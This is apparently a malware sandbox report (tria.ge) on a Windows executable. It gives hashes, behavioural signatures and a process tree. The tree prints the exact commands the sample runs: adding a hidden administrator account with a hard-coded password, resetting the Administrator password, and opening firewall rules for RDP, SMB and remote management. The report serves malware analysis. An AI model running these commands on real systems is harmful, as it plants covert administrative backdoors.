Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09/09/2024, 21:32
Static task
static1
Behavioral task
behavioral1
Sample
2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Resource
win10v2004-20240802-en
General
-
Target
2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
-
Size
1.2MB
-
MD5
1a027bd2e0bd67f33bb6ad6f4029b1c6
-
SHA1
763e46995b5401cb489a25c3b947000368911d4d
-
SHA256
2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50
-
SHA512
d27761d31cca6c425e555f85f9e12b076ce62efca1756f15e65d3bf1013ca660ad47464b6785d10c815e2b82f8de953db6a45b98e079fa462b73ac613434849f
-
SSDEEP
24576:XD7Xr5my0DPP23Iy5YAmRW6B8If0s83I4eqowSwa1X9tqY7Jxiq+n:XD7Xroy0DPP23Iy5YAmw6B8If0F3Iwo4
Malware Config
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 12 IoCs
flow pid Process 3 1268 powershell.exe 4 3528 powershell.exe 5 3352 powershell.exe 6 8 powershell.exe 7 4004 powershell.exe 8 2136 powershell.exe 9 4708 powershell.exe 10 5008 powershell.exe 11 3412 powershell.exe 12 1840 powershell.exe 13 1408 powershell.exe 14 3056 powershell.exe -
pid Process 2844 powershell.exe 2740 powershell.exe 4508 powershell.exe 3412 powershell.exe 5008 powershell.exe 2136 powershell.exe 4708 powershell.exe 8 powershell.exe 3056 powershell.exe 1268 powershell.exe 1840 powershell.exe 4004 powershell.exe 3352 powershell.exe 3528 powershell.exe 1408 powershell.exe 5296 powershell.exe 5364 powershell.exe -
Disables taskbar notifications via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 7 IoCs
pid Process 5696 netsh.exe 5968 netsh.exe 5924 netsh.exe 6592 netsh.exe 6760 netsh.exe 6744 netsh.exe 6312 netsh.exe -
Modifies WinLogon 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe -
Power Settings 1 TTPs 7 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4564 powercfg.exe 2628 powercfg.exe 2920 powercfg.exe 3308 powercfg.exe 1004 powercfg.exe 4976 powercfg.exe 1072 powercfg.exe -
Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\windows\whois.exe powershell.exe File created C:\windows\putty.exe powershell.exe File created C:\windows\Procmon.exe powershell.exe File created C:\windows\netscan.exe powershell.exe File created C:\windows\PsExec.exe powershell.exe File created C:\windows\winmtr.exe powershell.exe File created C:\windows\Fping.exe powershell.exe File created C:\windows\procexp.exe powershell.exe File created C:\windows\grep.exe powershell.exe File opened for modification C:\windows\resources\themes\BComp.theme 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe File created C:\windows\devcon.exe powershell.exe File created C:\windows\nircmd.exe powershell.exe File created C:\windows\TreeSizeFree.exe powershell.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
description ioc Process Key created \REGISTRY\MACHINE\software\microsoft\internet explorer\main 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL = "google.com" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "google.com" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe -
Modifies data under HKEY_USERS 32 IoCs
description ioc Process Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Set value (int) \REGISTRY\USER\default\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "1" reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced reg.exe Key created \REGISTRY\USER\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Set value (int) \REGISTRY\USER\default\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontUsePowerShellOnWinX = "1" reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced reg.exe Key created \REGISTRY\USER\DEFAULT\software\microsoft\windows\currentversion\policies\explorer reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Policies\Microsoft\Windows\Personalization reg.exe Key created \REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People reg.exe Key created \REGISTRY\USER\DEFAULT reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5008 powershell.exe 5008 powershell.exe 1408 powershell.exe 1408 powershell.exe 4004 powershell.exe 4004 powershell.exe 4508 powershell.exe 4508 powershell.exe 2844 powershell.exe 2844 powershell.exe 1840 powershell.exe 1840 powershell.exe 8 powershell.exe 8 powershell.exe 3528 powershell.exe 3528 powershell.exe 2740 powershell.exe 2740 powershell.exe 5364 powershell.exe 5364 powershell.exe 2136 powershell.exe 2136 powershell.exe 3412 powershell.exe 3412 powershell.exe 4004 powershell.exe 1268 powershell.exe 3056 powershell.exe 3056 powershell.exe 1268 powershell.exe 5296 powershell.exe 5296 powershell.exe 3352 powershell.exe 3352 powershell.exe 4708 powershell.exe 4708 powershell.exe 4508 powershell.exe 4508 powershell.exe 1268 powershell.exe 1408 powershell.exe 1408 powershell.exe 5008 powershell.exe 5008 powershell.exe 1840 powershell.exe 1840 powershell.exe 2740 powershell.exe 2740 powershell.exe 2844 powershell.exe 2844 powershell.exe 5296 powershell.exe 5296 powershell.exe 3528 powershell.exe 3528 powershell.exe 8 powershell.exe 8 powershell.exe 5364 powershell.exe 5364 powershell.exe 3352 powershell.exe 2136 powershell.exe 2136 powershell.exe 3412 powershell.exe 3412 powershell.exe 3056 powershell.exe 3056 powershell.exe 4708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeCreatePagefilePrivilege 4976 powercfg.exe Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeCreatePagefilePrivilege 4976 powercfg.exe Token: SeShutdownPrivilege 2628 powercfg.exe Token: SeCreatePagefilePrivilege 2628 powercfg.exe Token: SeShutdownPrivilege 2920 powercfg.exe Token: SeCreatePagefilePrivilege 2920 powercfg.exe Token: SeShutdownPrivilege 3308 powercfg.exe Token: SeCreatePagefilePrivilege 3308 powercfg.exe Token: SeShutdownPrivilege 1072 powercfg.exe Token: SeCreatePagefilePrivilege 1072 powercfg.exe Token: SeDebugPrivilege 5008 powershell.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 5296 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 1840 powershell.exe Token: SeDebugPrivilege 8 powershell.exe Token: SeDebugPrivilege 3528 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 5364 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 3412 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeShutdownPrivilege 4564 powercfg.exe Token: SeCreatePagefilePrivilege 4564 powercfg.exe Token: SeShutdownPrivilege 1004 powercfg.exe Token: SeCreatePagefilePrivilege 1004 powercfg.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeRestorePrivilege 7116 reg.exe Token: SeRestorePrivilege 6332 reg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3264 wrote to memory of 2488 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 85 PID 3264 wrote to memory of 2488 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 85 PID 3264 wrote to memory of 3720 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 86 PID 3264 wrote to memory of 3720 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 86 PID 3264 wrote to memory of 3480 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 87 PID 3264 wrote to memory of 3480 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 87 PID 3264 wrote to memory of 1056 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 88 PID 3264 wrote to memory of 1056 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 88 PID 2488 wrote to memory of 852 2488 cmd.exe 93 PID 2488 wrote to memory of 852 2488 cmd.exe 93 PID 852 wrote to memory of 900 852 net.exe 94 PID 852 wrote to memory of 900 852 net.exe 94 PID 3480 wrote to memory of 3184 3480 cmd.exe 95 PID 3480 wrote to memory of 3184 3480 cmd.exe 95 PID 1056 wrote to memory of 4664 1056 cmd.exe 96 PID 1056 wrote to memory of 4664 1056 cmd.exe 96 PID 3184 wrote to memory of 1636 3184 net.exe 97 PID 3184 wrote to memory of 1636 3184 net.exe 97 PID 3720 wrote to memory of 4692 3720 cmd.exe 98 PID 3720 wrote to memory of 4692 3720 cmd.exe 98 PID 4692 wrote to memory of 3588 4692 net.exe 99 PID 4692 wrote to memory of 3588 4692 net.exe 99 PID 4664 wrote to memory of 2576 4664 net.exe 100 PID 4664 wrote to memory of 2576 4664 net.exe 100 PID 3264 wrote to memory of 392 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 104 PID 3264 wrote to memory of 392 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 104 PID 3264 wrote to memory of 1516 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 105 PID 3264 wrote to memory of 1516 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 105 PID 3264 wrote to memory of 3104 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 107 PID 3264 wrote to memory of 3104 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 107 PID 3264 wrote to memory of 64 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 108 PID 3264 wrote to memory of 64 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 108 PID 3264 wrote to memory of 1476 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 110 PID 3264 wrote to memory of 1476 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 110 PID 3264 wrote to memory of 224 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 111 PID 3264 wrote to memory of 224 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 111 PID 3264 wrote to memory of 1968 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 112 PID 3264 wrote to memory of 1968 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 112 PID 3264 wrote to memory of 4152 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 113 PID 3264 wrote to memory of 4152 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 113 PID 3264 wrote to memory of 2252 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 115 PID 3264 wrote to memory of 2252 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 115 PID 3264 wrote to memory of 208 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 117 PID 3264 wrote to memory of 208 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 117 PID 3264 wrote to memory of 4544 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 118 PID 3264 wrote to memory of 4544 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 118 PID 3264 wrote to memory of 4976 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 124 PID 3264 wrote to memory of 4976 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 124 PID 3264 wrote to memory of 1004 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 125 PID 3264 wrote to memory of 1004 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 125 PID 3264 wrote to memory of 3308 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 126 PID 3264 wrote to memory of 3308 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 126 PID 3264 wrote to memory of 2920 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 127 PID 3264 wrote to memory of 2920 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 127 PID 3264 wrote to memory of 2628 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 128 PID 3264 wrote to memory of 2628 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 128 PID 3264 wrote to memory of 4564 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 130 PID 3264 wrote to memory of 4564 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 130 PID 3264 wrote to memory of 1072 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 131 PID 3264 wrote to memory of 1072 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 131 PID 3264 wrote to memory of 2740 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 133 PID 3264 wrote to memory of 2740 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 133 PID 3264 wrote to memory of 2844 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 134 PID 3264 wrote to memory of 2844 3264 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe 134 -
System policy modification 1 TTPs 7 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth = "1" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "3" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ = "0" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"1⤵
- Modifies visibility of file extensions in Explorer
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes"2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\net.exenet user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes3⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes4⤵PID:900
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user billros /active"2⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\net.exenet user billros /active3⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user billros /active4⤵PID:3588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net localgroup administrators" /add billros2⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\system32\net.exenet localgroup administrators /add billros3⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators /add billros4⤵PID:1636
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes"2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\net.exenet user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes3⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes4⤵PID:2576
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user administrator /active"2⤵PID:392
-
C:\Windows\system32\net.exenet user administrator /active3⤵PID:3808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator /active4⤵PID:5288
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -command set-localuser billros -passwordneverexpires $true"2⤵PID:1516
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command set-localuser billros -passwordneverexpires $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -command set-localuser administrator -passwordneverexpires $true"2⤵PID:3104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command set-localuser administrator -passwordneverexpires $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh int tcp set global chimney=disabled rss=disabled netdma=disabled2⤵PID:64
-
C:\Windows\system32\netsh.exenetsh int tcp set global chimney=disabled rss=disabled netdma=disabled3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall set icmp 8 enable2⤵PID:1476
-
C:\Windows\system32\netsh.exenetsh firewall set icmp 8 enable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any2⤵PID:224
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any2⤵PID:1968
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any2⤵PID:4152
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any2⤵PID:2252
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any2⤵PID:208
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall set service type=remoteadmin enable profile=all2⤵PID:4544
-
